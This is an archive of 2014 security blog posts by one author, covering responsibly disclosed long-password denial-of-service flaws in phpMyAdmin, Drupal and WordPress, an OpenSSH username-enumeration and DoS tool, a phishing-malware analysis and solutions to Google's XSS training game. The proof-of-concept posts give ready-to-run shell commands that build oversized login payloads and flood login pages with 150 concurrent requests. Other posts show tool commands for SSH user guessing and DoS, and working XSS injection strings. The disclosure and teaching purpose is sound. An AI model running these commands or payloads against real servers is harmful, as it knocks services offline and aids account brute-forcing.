Thursday, December 11, 2014

Assuming that time enough has happened since the security update was released by phpMyAdmin, we want to share our researches. As you already know, we believe in Responsible Disclosure and that is the reason why we didn't publish this post before.

You can read the vulnerability details in the previous blog post. In this one, we show you  the way to exploit it.

1 - Create the payload.

$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s" {1..1000000} >> payload

2 - Performing the Denial of Service attack.

$ for i in `seq 1 150`; do (curl --data @payload http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done


Posted on Thursday, December 11, 2014 by Javier Nieto

No comments

Wednesday, December 03, 2014

Introduction

"phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL, MariaDB and Drizzle. Frequently used operations (managing databases, tables, columns, relations, indexes, users, permissions, etc) can be performed via the user interface, while you still have the ability to directly execute any SQL statement."

Before starting with our findings, we would like to thank phpMyAdmin security team for their quick response and for their interest in keeping their software secure.

My partner @cor3dump3d from www.devconsole.info and me believe in responsible disclosure, that is the reason why we have waited until a patch has been released by phpMyAdmin security team before revealing full details.

Affected Versions

Versions 4.0.x (prior to 4.0.10.7), 4.1.x (prior to 4.1.14.8) and 4.2.x (prior to 4.2.13.1) are affected.

More info:

Vulnerability Details

The phpMyAdmin vulnerability we are going to talk about is similar to, but a little bit different and more dangerous than the previous ones we posted some days ago: CVE-2014-9016 and CVE-2014-9034. This post describes a Proof of Concept about how to perform a Denial of Service by using long passwords which affects to the software mentioned above.

Now, we have discovered that phpMyAdmin is vulnerable to the same attack but this time for a different reason...

Why did we say more dangerous than the previous ones? In order to take advantage of this vulnerability in Drupal and Wordpress, we needed to know a valid username before launching the attack. In phpMyAdmin, it is not required to know a valid username.

In phpMyAdmin the attack works different because phpMyAdmin does not maintain any user accounts and when the user logs into phpMyAdmin, it simply relays the password to MySQL, and MySQL is not affected by this vulnerability. These are the results of these MySQL  login attempts:

Password length: 1000000 Total execution time in seconds: 0.018867969512939
Password length: 2000000 Total execution time in seconds: 0.03835391998291
Password length: 3000000 Total execution time in seconds: 0.056785106658936
Password length: 4000000 Total execution time in seconds: 0.075578212738037
Password length: 5000000 Total execution time in seconds: 0.09423303604126
Password length: 6000000 Total execution time in seconds: 0.11118984222412
Password length: 7000000 Total execution time in seconds: 0.13226509094238
Password length: 8000000 Total execution time in seconds: 0.1476719379425
Password length: 9000000 Total execution time in seconds: 0.16580295562744

So, which is the cause because phpMyAdmin is affected to this kind of attack?

If we try a login attempt by using a valid or non valid username and a 1.000.000 length password we will obtain the error below.


* Notice that 30 seconds is the maximum time a script is allowed to run before it is terminated by the parser. This helps prevent poorly written scripts from tying up the server.

Researching a little bit more, we see that in PhpMyAdmin cookie mode authentication, the password is stored, encrypted with the AES algorithm, in a temporary cookie.

We have tried to encrypt with AES these long strings and we have observed an increase of time calculation according to the length the strings.

Text length: 1024 ==> AES calculation time in seconds: 0.0085389614105225
Text length: 10240 ==> AES calculation time in seconds: 0.069222927093506
Text length: 51200 ==> AES calculation time in seconds: 0.35328578948975
Text length: 102400 ==> AES calculation time in seconds: 0.72205591201782
Text length: 512000 ==> AES calculation time in seconds: 3.5483829975128
Text length: 1024000 ==> AES calculation time in seconds: 7.1560480594635
Text length: 102400000 ==> AES calculation time in seconds: 733.4890639782

When this test was performed locally, a CPU resource exhaustion was observed.  Notice that the server doesn't crash because of the AES calculation. The vulnerability appears in conjunction with Apache, because Apache waits to PHP to finish the AES calculation. In a concurrent authentication process with a valid or non valid user and very long passwords, on the one hand PHP consumes the CPU with AES calculation processes and in the other hand, the Apache processes which are waiting, consumes the memory until the server crashes.

The result is a Denial of Service condition because of memory exhaustion.


This problem is solved in the latest phpMyAdmin patch. By applying this patch, the user credentials are stored only after a successful authentication. Further, it truncates passwords to a length of 256.

How to fix

Upgrade to phpMyAdmin 4.0.10.7 or newer, or 4.1.14.8 or newer, or 4.2.13.1 or newer.

Proof of concept

A proof of concept will be published soon. Until that, update your phpMyAdmin installations.

CVE Information

CVE-2014-9218 has been assigned to this vulnerability.

Timeline

November 26, 2014 - We sent a complete report about the vulnerability to the phpMyAdmin security team.

November 27, 2014 - phpMyAdmin started to work on this security issue.

December 3, 2014 - The phpMyAdmin security update and the security advisory is published.

References

http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html

http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html

http://www.devconsole.info/?p=1050

http://www.breaksec.com/?p=6362

http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/


Posted on Wednesday, December 03, 2014 by Javier Nieto

No comments

Monday, December 01, 2014

Assuming that time enough has happened since the security update was released by Wordpress and Drupal, we want to share our researches. As you already know, we believe in Responsible Disclosure and that is the reason why we didn't publish this post before.

Set Quality to 720p

Drupal Denial of Service CVE-2014-9016

Generate a pyaload and try with a non-valid user:

$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload

$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Generate a pyaload and try with a valid user:

$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

$ time curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Perform a Dos with a valid user:

$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done

Wordpress Denial of Service CVE-2014-9034

Generate a pyaload and try with a non-valid user:

$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload

$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Generate a pyaload and try with a valid user:

$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Perform a Dos with a valid user:

$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php  --silent > /dev/null &); sleep 0.25; done

Python Code

https://github.com/c0r3dump3d/wp_drupal_timing_attack

References

http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html

http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html

http://www.devconsole.info/?p=1050

https://wordpress.org/news/2014/11/wordpress-4-0-1/ 

https://www.drupal.org/SA-CORE-2014-006 

https://www.drupal.org/node/2378367

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016

Posted on Monday, December 01, 2014 by Javier Nieto

No comments

Friday, November 21, 2014

Introduction

Wordpress is the CMS most used Worldwide. According to w3techs.com WordPress is used by 61.1% of all the websites whose content management system they know. This is 23.2% of all websites.

My partner @cor3dump3d from www.devconsole.info and me believe in responsible disclosure, that is the reason why we have waited until a patch has been released by Wordpress security team before revealing full details.

Notice that this security issue is exactly the same we talked about yesterday. Both of them, Drupal and Wordpress had the same security flaw which is now  solved in the latest versions.

Wordpress affected versions 

Wordpress versions prior to 4.0.1

More info:

Vulnerability Details

We've been researching about the security in Wordpress and we would like to share our results with you. We have discovered a vulnerability which can be used against default Wordpress installations in order to:

  • Guess usernames
  • Perform a Denial of Service

With the scenarios below, we will show you how this attack works. When we want to login to Wordpress site, we need to type a username and a password:

Scenario 1:
If the username doesn't exist, the password hash is not calculated because the username doesn't exist.

Scenario 2:
If the username exists, the password hash is calculated and compared with the hash stored in the database. If the hash compared is the same, you are granted access to the system. If not, you are rejected.

Scenario 3 - Taking advantage of the vulnerability:

User guessing
If the username exists and the password typed is for example 1000000 A's, the fact that when a hash of such a long password is generated in order to compare it with the hash stored in the database, it takes much longer and the time measurement is increased. So if the delay is increased, the username exists.

In Wordpress, the way of calculating the password hash (MD5 with a salt) by using phpass results in the cpu resources being affected when really long passwords are provided.

Denial of service
If we perform several login attempts by using a valid username at the same time with long passwords, that causes a Denial of Service in the server. We have observed two different scenarios in a Wordpress 7.32, Apache and MySQL default installation. Depending on how many login attempts and the time between them, we will have two different scenarios:

  • The DOS attack crashes the entire server because the RAM and swap is  reached. Also the CPU is reached.



  • The DOS attack crashes the database.


Notice the server doesn't crash because of the hash calculation. The vulnerability appears in conjunction with Apache, because Apache waits to PHP to finish the hash calculation. In a concurrent authentication process with a valid user and very long passwords, on the one hand PHP consumes the CPU with calculation processes and in the other hand, the Apache processes which are waiting, consumes the memory until the server or the database crashes.

If the apache configuration is optimized and tuned to the hardware resources, we are able to reach all sessions available quickly and handle them for 30 seconds which performs a DOS without crashing the server or database.

Why did we say 30 seconds?

30 seconds is the maximum time a script is allowed to run before it is terminated by the parser. By default, max_execution_time value is set to 30 in the php.ini config. This helps prevent poorly written scripts from tying up the server.

How to fix

If you don't have set the automatic updates in Wordpress do it or install the latest version.

In the latest version, Wordpress only calculates the hash for passwords < 4096 length.

Proof of Concept

http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html

CVE Information

CVE-2014-9034 has been assigned to this vulnerability.

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034

References


http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/

https://administratosphere.wordpress.com/2011/06/16/generating-passwords-using-crypt3/

http://www.breaksec.com/?p=6362


Posted on Friday, November 21, 2014 by Javier Nieto

No comments

Wednesday, November 19, 2014

Introduction

First of all, let me introduce you to my partner @cor3dump3d from www.devconsole.info We have written this post together and we hope you enjoy it. More technical information about this topic could be found at my partner post: http://www.devconsole.info/?p=1050

Before starting with our findings, we would like to thank @drupalsecurity team for their quick response and for their interest in keeping Drupal secure. It is the fastest and most efficient security team we have ever talked to... Around two hours after sending the vulnerability, we received the vulnerability confirmation and a patch was proposed...

As you already know, Drupal is an open source content management platform powering millions of websites and applications. It’s built, used, and supported by an active and diverse community of people around the world.

We believe in responsible disclosure, that is the reason why we have waited until a patch has been released by Drupal security team before revealing full details.

Drupal affected versions

Drupal core 7.x versions prior to 7.34
Secure Password Hashes 6.x-2.x versions prior to 6.x-2.1.

More info:

Vulnerability Details

We've been researching about the security in Drupal and we would like to share our results with you. We have discovered a vulnerability which can be used against default Drupal installations in order to:

  • Guess usernames
  • Perform a Denial of Service

With the scenarios below, we will show you how this attack works. When we want to login to Drupal site, we need to type a username and a password:

Scenario 1:
If the username doesn't exist, the password hash is not calculated because the username doesn't exist.

Scenario 2:
If the username exists, the password hash is calculated and compared with the hash stored in the database. If the hash compared is the same, you are granted access to the system. If not, you are rejected.

Scenario 3 - Taking advantage of the vulnerability:

User guessing
If the username exists and the password typed is for example 1000000 A's, the fact that when a hash of such a long password is generated in order to compare it with the hash stored in the database, it takes much longer and the time measurement is increased. So if the delay is increased, the username exists.

In Drupal, the way of calculating the password hash (SHA512 with a salt) by using phpass results in the cpu resources being affected when really long passwords are provided.

Denial of service
If we perform several login attempts by using a valid username at the same time with long passwords, that causes a Denial of Service in the server. We have observed two different scenarios in a Drupal 7.32, Apache and MySQL default installation. Depending on how many login attempts and the time between them, we will have two different scenarios:

  • The DOS attack crashes the entire server because the RAM and swap is  reached. Also the CPU is reached.


  • The DOS attack crashes the database.


Notice the server doesn't crash because of the hash calculation. The vulnerability appears in conjunction with Apache, because Apache waits to PHP to finish the hash calculation. In a concurrent authentication process with a valid user and very long passwords, on the one hand PHP consumes the CPU with calculation processes and in the other hand, the Apache processes which are waiting, consumes the memory until the server or the database crashes.

If the apache configuration is optimized and tuned to the hardware resources, we are able to reach all sessions available quickly and handle them for 30 seconds which performs a DOS without crashing the server or database.

Why did we say 30 seconds?

30 seconds is the maximum time a script is allowed to run before it is terminated by the parser. By default, max_execution_time value is set to 30 in the php.ini config. This helps prevent poorly written scripts from tying up the server.

How to fix

Install the latest version:

  • If you have configured a custom password.inc file for your site you need to make sure that it is not prone to the same vulnerability.

Drupal 7.34 version verifies that passwords longer than 512 bytes are not hashed

Proof of Concept

http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html

CVE information

CVE-2014-9016 has been assigned to this vulnerability.

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016

Timeline

October 23, 2014 at 5:11am - We sent a complete report about the vulnerability  to Drupal.

October 23, 2014 at 6:43am - Drupal answered confirming the vulnerability and proposing a patch.

November 19, 2014 at 8:54pm - A Drupal security update and the security advisory is published.

December 01, 2014 16:05 - Proof of concept published

References


http://www.devconsole.info/?p=963

http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/

https://administratosphere.wordpress.com/2011/06/16/generating-passwords-using-crypt3/

http://www.breaksec.com/?p=6362


Posted on Wednesday, November 19, 2014 by Javier Nieto

2 comments

Tuesday, September 02, 2014

Some days ago a friend told me, "Ey! Why you didn't write a post talking about how Parsero has been included in the Kali Linux repository?" "Seriously? I forgot it..." So here it is...

As you already know, Kali Linux is one of the most advanced and versatile penetration testing distribution ever made. Kali Linux originally started with earlier version of live Linux distribution named BackTrack. It is a GPL-compliant Linux distribution built by penetration testers for penetration tester. With millions of downloads, it has become the most widely adopted penetration testing framework in existence and is used by the security community all over the world.

That is the reason why I am really proud of announcing that my tool Parsero has been included in the Kali Linux repositories: http://tools.kali.org/information-gathering/parsero

Parsero is a free script written in Python which reads the Robots.txt file of a web server and looks at the Disallow entries. The Disallow entries are the URL path of directories or files hosted on a web server which the administrators don't want to be indexed by crawlers. For example, "Disallow: /portal/login" don't allow to search engines like Google, Bing, Yahoo to index  www.example.com/portal/login  so nobody can locate it by searching on them.

Sometimes these paths typed in the Disallows entries are directly accessible by the users (without using a search engine) just visiting the URL and the Path. Sometimes they are not available to be visited by anybody... Because it is really common that the administrators write a lot of Disallows and some of them are available and some of them are not, you can use Parsero in order to check the HTTP status code of each Disallow entry in order to check automatically if these directories are available or not.

Also, the fact that the administrator write a Robots.txt doesn't mean that the files or directories typed in this file will not be indexed by Bing, Google, Yahoo... For this reason, Parsero is capable of performing searches in Bing to locate content indexed without the web administrator authorization.

Now, you can run Parsero v0.75 directly from this awesome distribution. So, what do you need to use Parsero in Kali Linux?

Installing Parsero in Kali Linux

First of all, you need to execute:

root@kali:~# apt-get update


Then, you can search directly Parsero in the Kali Linux repositories by using the command bellow:

root@kali:~# apt-cache search parsero



Finally run the following command to install it.

root@kali:~# apt-get install parsero


Now you can have fun by checking the directories or files which could have sensitive information and should be "anonymous" to the search engines...


Currently, I'm working on developing the new release which will have another feature. It will be available here: https://github.com/behindthefirewalls/Parsero



Posted on Tuesday, September 02, 2014 by Javier Nieto

No comments

Tuesday, August 26, 2014

When I was reading one of the last FireEye's post, I was struck by the binary they said it came in the form of phished email (MD5:7c00ba0fcbfee6186994a8988a864385) purportedly from Armani regarding an order. I believe it is interesting to analyze because it could be a real example of an APT or maybe just another spread malware  campaign. The techniques used in this real case, could be used in both scenarios...

But FireEye shared the mail's MD5 checksum and they didn't provide us with a copy of the message. Thanks to the last ContagioDump post, we are able to download all samples and a little more FireEye previously mentioned.

After downloading and opening the message, we can see the details of this mail in the picture bellow. It appears to have been sent by confirmation(at)armani[.]com and contains what appears to be an order with a file attached.

 Analysing the SMTP headers

Before opening the file attached, let's see the mail headers to get deep into who really sent the message.


We can see the IP (which sent the mail) comes from Paris and the WHOIS description tells us that this IP belongs to a "Wifi Address Pool". Maybe it is a free Wifi or a hacked Wifi where the hackers were connected to send the email, or maybe the host which delivered the mail was infected and was connected to this Wifi when the mail was sent...

By reading the mail headers, we can get more information like the mail's hops. Notice the second one has been blacklisted.


If we continue analyzing the headers we can see something weird...



In the pictures above we can see that the X-sender and the Return-Path belong to a hotel mail account. These fields mean:

  • X-Sender: Tell us the real sender directly in the message headers. 
  • Return-Path: Denotes the real sender but only "post factum".

I've checked that the SMTP servers from which the mail was sent need authorization to send e-mails. Also, the hotel mail account which delivered the mails used the SMTP servers which are hosted in the same hosting provider that the hotel web site is hosted on. So we could assume that this hotel is using these servers to send mail and the mail account could have been stolen. The hackers sent the phished mail from the hotel account but changing the "from" to confirmation(at)armani[.]com

Also we can see that the domain name of the company spoofed doesn't have a SPF record. That means that it is easier to send an email with the "from" faked. A SPF record prevent spammers from sending messages with forged From addresses. Here you can get more valuable info about SPF.

Tricking the end user

After spending some time digging into the SMTP headers to have further information about the sender, is time to focus on the attachment.


It seems an attempt has been made to disguise this file as a PDF file but we noticed that  the extension is actually ".7z". If we unzip the file inside the ".7z" file to our Desktop...


...we see that the icon appears to be a PDF file with a weird extension: "pdf%%". We can't see the .exe extension because the "hide extensions for known file types" option is enabled in our Windows. FireEye said that this this file is using RTLO to trick the user but we can't see this technique in the attachment, at least the extension doesn't change... By using RTLO it would be expected to have an extension "exe.pdf" instead of "pdf.exe" which runs as an application, but the attachment doesn't work in this way in our Windows 7. But it doesn't matter, maybe in my next post I will talk about how easy is using RTLO and icon changing to trick a user into opening a file which appears to be a valid document but it is actually malware. That kind of techniques are really used in really attacks like in Siesta Campaign or others ones used like WinRar File extension spoofing.

I would like to look at the executable before continuing about how the hackers are trying to trick the user. We notice that this executable is signed with a certificate which has been revoked.

This stolen certificate has been used to bypass the security system of so many security software and devices. Some of them, the first check they do is to discover if the executable is signed, and if it is with a valid certificate, no more security actions are made and the executable is allowed to get into the network. Of course, after the company realized this problem, they revoked the certificate...

So, what happens if we execute the file which looks like a PDF file?

While the malware is doing evil actions, a web browser is open with the supposed Armani order.


For security guys, these techniques do not go unnoticed to a trained eye, but we can see how it happens every day to the layman.

Conclusion

Thanks to Fireye and Contagiodump who shared their analysis and samples, we have been able to see how the hacker probably got access to a hotel mail account to start a SPAM campaign and sent a spear phishing attack. They spoofed a mail account of a well know clothes brand. That company doesn't have a SPF record to prevent from being spoofed.

Also, we have observed  how the hacker has tried to disguised the malicious executable as PDF by changing the icon to a PDF picture and maybe using RTLO. Also, after opening the file, a web browser is opened with the apparent order while the malware is doing evil actions.

Moreover, I've been researching a little more about that case and I've found an advertisement in Facebook https://www.facebook.com/Marnaque/posts/491122357681969 which talks about a similar phished mail. Notice that now they are trying to spoof another clothes brand and they are using a similar body mail using the same order number: 0801E376E15829. We can suspect the same guys are behind that...


Posted on Tuesday, August 26, 2014 by Javier Nieto

No comments

Tuesday, July 15, 2014

You already know what the most common way of getting a job is. You usually look for vacancies in a job web portal and when you think you could be selected, you apply for it... Then, most of the companies look at your resume and start reading about your previous experience and your studies...

But if you are looking at getting a new job in the security field, take a moment to look around before sending your resume... Maybe the company is giving you an advantage against the other candidates and you have no idea about it.

Have you looked at the web code source?

Yes, you have read well. Maybe you are using a well known security scanner and maybe you would like to work for them. You should research the company a little bit more. For example, visit their website and look at their web code source... Sometimes you have some surprises as you can see in the picture bellow...

Looking at your network traffic

Here, another real example... While I was studying in order to improve my technical skills, I found a hint in the PCAP network capture by using Wireshark... I never would have imagined that I could find a new job by reading a network traffic capture...


Looking into the HTTP headers

What we really discovered before was that the company changed the HTTP header in order to show you a "secret" message. So, instead of getting a traffic capture to read the "secret" message, we could use wget to try to look for a new oportunity.

wget -S example.com -O /dev/null


Looking for a job in Shodan

You already know that Shodan grab and index the HTTP headers they scan... So we can get a lot of results as the previous one by using Shodan.

Here, more examples....

http://www.shodanhq.com/search?q=x-hacker+work


http://www.shodanhq.com/search?q=x-hacker+job


http://www.shodanhq.com/search?q=hiring



Posted on Tuesday, July 15, 2014 by Javier Nieto

No comments

Tuesday, July 01, 2014

Introduction

In this post I'd like to introduce you to an awesome tool focused on taking advantage of an OpenSSH vulnerability. I'd like to thank @cor3dump3d for letting me participate in his project. Before starting, just a brief introduction...

OpenSSH is a well-known tool to remotely manage *nix systems. It has replaced to telnet, rlogin, and ftp. Using these tools, the data (even passwords) is transmitted across the network unencrypted. OpenSSH encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks... But will not eliminate all kinds of attacks, for example, the OpenSSH User Enumeration Time-Based Attack. Osueta has been developed to take advantage of that OpenSSH bug and offers us a way to improve our Brute Force attacks against an OpenSSH server.

In a Brute Force attack, we try different usernames and passwords in combination until the attack is successful. It is successful when we get access to the system by using the credentials guessed.  So, we need to know two fields to be authenticated on a OpenSSH server: Username and Password.

Thanks to Osueta, we are able to guess the usernames available on the OpenSSH server. So if the usernames have been guessed, we have 50% of the credentials and the time needed to perform the Brute Force attack (by using Username Password combinations) will be reduced because we already know the username.

How does this bug work?

With the scenarios below, I will show you how this attack works. When we want to connect to an OpenSSH server, we need to type a username and password.
 
Scenario 1

If the username doesn't exist, the password is not compared to the original one.

Scenario 2

If the username exists, the password is compared with the original one. If the hash compared is the same, you are granted access to the system. If not, you are rejected.

Scenario 3

If the username exists and the password typed is for example 40.000 A's (40000 bytes), the fact of generating the hash of this long password in order to compare it with the original one, makes the system slow down and the time measurement is increased. So if the delay is increased when we use this long password, the username exists.

The picture below shows the performance of my computer when I tried an invalid username:


And now, that is the performance while it was being tested with a valid username and a password of 40000 bytes:


Find more info about this bug OpenSSH User Enumeration Time-Based Attack  

Notice that OpenSSH 5.* 6.* servers are affected...

Working with Osueta

Ok. We have learned a little bit more from this bug and now it is the time to take advantage of it.

Before starting, we need to install the packages below:

# apt-get install python-ipy python-nmap python-paramiko

Then, we can download Osueta from Github:

$ git clone https://github.com/c0r3dump3d/osueta.git

Notice the first thing Osueta does when it is executed, is to test 10 random users to check the server delay in order to know how much time we can expect to wait (in normal conditions) until a reply is received  from the server. Osueta establishes a rate limit and if it is exceeded, the user exits.

Example 1. Guessing if a single user if it is available.

./osueta.py -H 127.0.0.1 -U jnieto -p 22



Example 2. Guessing usernames from a list.

./osueta.py -H 127.0.0.1 -L users.txt -p 22



Example 3. Trying a DOS of the OpenSSH service. Notice you need to know or to guess a username to perform a DOS attack.

./osueta.py -H 127.0.0.1 -p 22 -U jnieto -v no --dos yes


You can see the result of this attack in the picture below... The CPU is up to 100% and there are a lot of connections to the OpenSSH server.


When the number of sessions is reached, the machine starts to reject the rest of connections causing a DOS.



Posted on Tuesday, July 01, 2014 by Javier Nieto

3 comments

Friday, June 06, 2014


In the previous post we talked about how to resolve the exercises 1, 2 and 3 of the XSS-game proposed by Google. Now, we are going to resolve the latest ones.

Exercise 4

This exercise is similar to the previous one (Exercise 3). The main difference is that now,  we have an input. 

It is expected that a number will be typed into the box, but... what will happen if we write a name instead of typing a number?



What happens is that our string has been included into the "img" tag...


So, if we use:  3');alert('Behindthefirewalls the result would be...



And the alert appears...

Exercise 5

I don't know what the reason for looking at "next=confirm" was at first because logic would dictate that the first attempt would be to try to exploit a XSS vulnerability in the input field...


But the first thing that I did was to replace "confirm" by "http://www.behindthefirewalls", reload the page, type my mail and click on "Next" and the result was that I was redirected to my blog...

https://xss-game.appspot.com/level5/frame/signup?next=http://www.behindthefirewalls.com


We have discovered another security issue but what we want to do is  locate a XSS vulnerability.

I was trying different options with no success so I decided to read the hints offered by Google. "If you want to make clicking a link execute Javascript (without using the onclick handler), how can you do it?"

So I tried to use:

next=javascript:alert("behindthefirewalls")

And the alert appeared.

Exercise 6 

The fourth hit says: "If you can't easily host your own evil JS file, see if google.com/jsapi?callback=foo will help you here."

If we change "foo" for "alert" www.google.com/jsapi?callback=alert will have included in its code:



So, if we use the link bellow, we can exploit the vulnerability.

frame#//www.google.com/jsapi?callback=alert 



I spent some time trying to solve this exercise in a different way. I tried a lot of possibilities to exploit a XSS vulnerability...



... until I remembered a post I read some months ago...

#data:text/javascript,alert('behindthefirewalls')




Posted on Friday, June 06, 2014 by Javier Nieto

3 comments

Wednesday, June 04, 2014

As Google say, "Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps..."

So they have decided to help us to learn how to exploit these kinds of vulnerabilities by creating a vulnerable web site at:

https://xss-game.appspot.com/

There are 6 exercises to resolve. Before starting to resolve these issues... Why should I  know how to exploit a XSS vulnerability?

  1. To be more qualified in the security field.
  2. To make money.
Currently, Google is paying up to $7,500 for dangerous XSS bugs discovered in their most sensitive products.


But Google is not the only one who is paying a bounty for disclosing vulnerabilities. Others like Yahoo, Facebook or Paypal have the same  policy of rewards for discovering bugs.

In this post, we are going to resolve 3 issues proposed by Google. In the next post, we will resolve the latest ones.

Exercise 1

That is the easiest exercise. Our input will be directly included in the page without proper escaping.

By inserting the code below, we will be successful.

<script>alert('BehindTheFirewalls')</script>





Exercise 2

This exercise is an example of how to perform a persistent or stored Cross-Site Scripting attack in a simple way.

<img src=x onerror=alert('BehindTheFirewalls')>

Exercise3

This exercise is a little complex because the user doesn't have an input to try to exploit the XSS. 


But what happen if we rewrite the URI? If we change "#1" by "#11111"...

... we will see that "1111" has been added to the source code. 

So, if we add #11111'onerror=alert('BehindTheFirewalls')> at the end of the URL, the code will be:

<img src='/static/level3/cloud#11111'onerror=alert('BehindTheFirewalls')>'.jpg' />

And the alert will appear.



These are the three posible options to exploit this vulnerability.

/frame#1'onerror=alert('BehindTheFirewalls')>

/frame#1.jpg'onload=alert('BehindTheFirewalls')>

/frame#1jpg'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>


Posted on Wednesday, June 04, 2014 by Javier Nieto

2 comments